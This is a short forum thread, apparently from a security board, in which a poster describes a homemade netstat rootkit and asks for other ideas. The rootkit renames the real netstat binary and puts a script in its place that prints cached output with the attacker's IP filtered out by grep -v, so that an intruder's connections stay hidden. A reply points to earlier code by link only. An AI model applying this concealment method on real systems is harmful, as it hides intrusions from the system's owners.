Hi people

i m coding a simple C program, to include on an "tool package" where i have some programs indespesable in pen tests, but ie got one question.. it's about netstat.. and how the netstat rootkits work.. how they hide connection's between the kidie and the server, and all the important stuuf about netstat rootkits, any paper about that?

so i have made my own, it works like that, first it ask's for the cracker Ip adress and put it into a var, next, it executes netstat and put the result into a text file, but without the cracker ip adress, like this (netstat | grep -v 192.xxx.xxx.x ) to a file caled netstat.tmp . ok we have a text file without our adress. now it renames the true netstat to other one, like netstat.old .. and create a shellscript with the name of the original netstat..
when someone executes netstat, the shelllscript will be loaded and cats (cat netstat.tmp) to the screen, it's an easy way that i found to make that, any other ideias?!


greetz

cant you just do something like this.

new "netstat":

I posted the code to netstat that did just that, but i dont know where it went. It was quite sometime ago. I will look around and see if i can find it again.

Edited: Here is my original post. http://www.governmentsecurity.org/forum/in...st=0&#entry1245